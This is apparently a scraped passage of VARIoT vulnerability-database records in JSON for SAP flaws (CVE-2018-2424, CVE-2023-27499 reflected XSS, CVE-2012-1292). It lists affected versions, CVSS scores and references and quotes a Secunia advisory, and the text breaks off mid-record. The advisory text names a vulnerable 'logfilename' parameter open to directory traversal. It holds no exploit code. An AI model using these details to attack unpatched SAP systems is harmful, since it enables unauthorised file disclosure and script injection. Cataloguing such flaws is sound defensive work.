"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "BID",
"id": "104459"
},
{
"date": "2018-08-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"date": "2018-06-12T15:29:00.307000",
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"date": "2018-06-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "BID",
"id": "104459"
},
{
"date": "2018-08-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"date": "2019-10-09T23:40:05.667000",
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP UI5 Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006576"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "104459"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
],
"trust": 0.9
}
}
var-202304-0812
Vulnerability from variot
SAP GUI for HTML - versions KERNEL 7.22, 7.53, 7.54, 7.77, 7.81, 7.85, 7.89, 7.91, KRNL64UC, 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could craft a malicious URL and lure the victim to click, the script supplied by the attacker will execute in the victim user's browser. The information from the victim's web browser can either be modified or read and sent to the attacker. SAP of SAP NetWeaver and SAP Netweaver Application Server ABAP Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202304-0812",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.54"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.77"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64uc"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.22"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.81"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.89"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64uc_7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.22ext"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.91"
},
{
"model": "netweaver application server abap",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.85"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver application server abap",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007137"
},
{
"db": "NVD",
"id": "CVE-2023-27499"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.22ext:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:7.77:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:7.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:7.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:7.89:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:7.54:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:7.91:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-27499"
}
]
},
"cve": "CVE-2023-27499",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2023-27499",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-27499",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2023-27499",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202304-708",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007137"
},
{
"db": "NVD",
"id": "CVE-2023-27499"
},
{
"db": "NVD",
"id": "CVE-2023-27499"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP GUI for HTML - versions KERNEL 7.22, 7.53, 7.54, 7.77, 7.81, 7.85, 7.89, 7.91, KRNL64UC, 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could craft a malicious URL and lure the victim to click, the script supplied by the attacker will execute in the victim user\u0027s browser. The information from the victim\u0027s web browser can either be modified or read and sent to the attacker. SAP of SAP NetWeaver and SAP Netweaver Application Server ABAP Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-27499"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-007137"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-27499",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2023-007137",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202304-708",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007137"
},
{
"db": "NVD",
"id": "CVE-2023-27499"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
]
},
"id": "VAR-202304-0812",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:26:40.927000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP GUI Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=234165"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007137"
},
{
"db": "NVD",
"id": "CVE-2023-27499"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/3275458"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-27499"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-27499/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007137"
},
{
"db": "NVD",
"id": "CVE-2023-27499"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007137"
},
{
"db": "NVD",
"id": "CVE-2023-27499"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-11-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-007137"
},
{
"date": "2023-04-11T03:15:07.547000",
"db": "NVD",
"id": "CVE-2023-27499"
},
{
"date": "2023-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-11-17T06:52:00",
"db": "JVNDB",
"id": "JVNDB-2023-007137"
},
{
"date": "2023-04-18T16:02:19.700000",
"db": "NVD",
"id": "CVE-2023-27499"
},
{
"date": "2023-04-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0 of \u00a0SAP\u00a0NetWeaver\u00a0 and \u00a0SAP\u00a0Netweaver\u00a0Application\u00a0Server\u00a0ABAP\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007137"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202304-708"
}
],
"trust": 0.6
}
}
var-201202-0348
Vulnerability from variot
Unspecified vulnerability in the MessagingSystem servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the MessagingSystem Performance Data via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a vulnerability in SAP NetWeaver. Because the input passed to the b2b/admin/log_view.jsp or b2b/admin/log.jsp script in the Internet Sales module via the \"logfilename\" parameter is missing validation before being used to display the file, it can result in arbitrary files being obtained through the directory traversal sequence. information. SAP NetWeaver is prone to multiple input-validation vulnerabilities, including: 1. A cross-site scripting vulnerability 2. Multiple directory traversal vulnerabilities 3. Multiple information-disclosure vulnerabilities Attackers can exploit these issues to execute arbitrary script code in the context of the website, steal cookie-based authentication information, and disclose sensitive information. Other attacks are also possible. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm
TITLE: SAP NetWeaver Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA47861
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47861/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47861
RELEASE DATE: 2012-02-21
DISCUSS ADVISORY: http://secunia.com/advisories/47861/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/47861/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47861
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Digital Security Research Group has reported some vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks and by malicious users and malicious people to disclose sensitive information. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences.
Successful exploitation of vulnerabilities #1 and #2 may require permission to view logs.
The vulnerabilities are reported in version 7.0. Other versions may also be affected.
SOLUTION: Apply SAP Security Notes 1585527 and 1583300.
PROVIDED AND/OR DISCOVERED BY: Dmitriy Chastukhin, Digital Security Research Group.
ORIGINAL ADVISORY: Digital Security Research Group: http://dsecrg.com/pages/vul/show.php?id=412 http://dsecrg.com/pages/vul/show.php?id=413 http://dsecrg.com/pages/vul/show.php?id=414 http://dsecrg.com/pages/vul/show.php?id=415 http://dsecrg.com/pages/vul/show.php?id=416
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201202-0348",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 5.7,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001572"
},
{
"db": "NVD",
"id": "CVE-2012-1292"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1292"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Chastukhin of Digital Security Research Group.",
"sources": [
{
"db": "BID",
"id": "52101"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1292",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2012-1292",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-1292",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201202-446",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001572"
},
{
"db": "NVD",
"id": "CVE-2012-1292"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the MessagingSystem servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the MessagingSystem Performance Data via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a vulnerability in SAP NetWeaver. Because the input passed to the b2b/admin/log_view.jsp or b2b/admin/log.jsp script in the Internet Sales module via the \\\"logfilename\\\" parameter is missing validation before being used to display the file, it can result in arbitrary files being obtained through the directory traversal sequence. information. SAP NetWeaver is prone to multiple input-validation vulnerabilities, including:\n1. A cross-site scripting vulnerability\n2. Multiple directory traversal vulnerabilities\n3. Multiple information-disclosure vulnerabilities\nAttackers can exploit these issues to execute arbitrary script code in the context of the website, steal cookie-based authentication information, and disclose sensitive information. Other attacks are also possible. ----------------------------------------------------------------------\n\nSecunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March\nListen to our Chief Security Specialist, Research Analyst Director, and Director Product Management \u0026 Quality Assurance discuss the industry\u0027s key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA47861\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/47861/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861\n\nRELEASE DATE:\n2012-02-21\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/47861/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/47861/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nDigital Security Research Group has reported some vulnerabilities in\nSAP NetWeaver, which can be exploited by malicious people to conduct\ncross-site scripting attacks and by malicious users and malicious\npeople to disclose sensitive information. \nThis can be exploited to disclose the contents of arbitrary files via\ndirectory traversal sequences. This can be exploited to disclose the contents of\narbitrary files via directory traversal sequences. \n\nSuccessful exploitation of vulnerabilities #1 and #2 may require\npermission to view logs. \n\nThe vulnerabilities are reported in version 7.0. Other versions may\nalso be affected. \n\nSOLUTION:\nApply SAP Security Notes 1585527 and 1583300. \n\nPROVIDED AND/OR DISCOVERED BY:\nDmitriy Chastukhin, Digital Security Research Group. \n\nORIGINAL ADVISORY:\nDigital Security Research Group:\nhttp://dsecrg.com/pages/vul/show.php?id=412\nhttp://dsecrg.com/pages/vul/show.php?id=413\nhttp://dsecrg.com/pages/vul/show.php?id=414\nhttp://dsecrg.com/pages/vul/show.php?id=415\nhttp://dsecrg.com/pages/vul/show.php?id=416\n\nOTHER REFERENCES:\nFurther details available in Customer 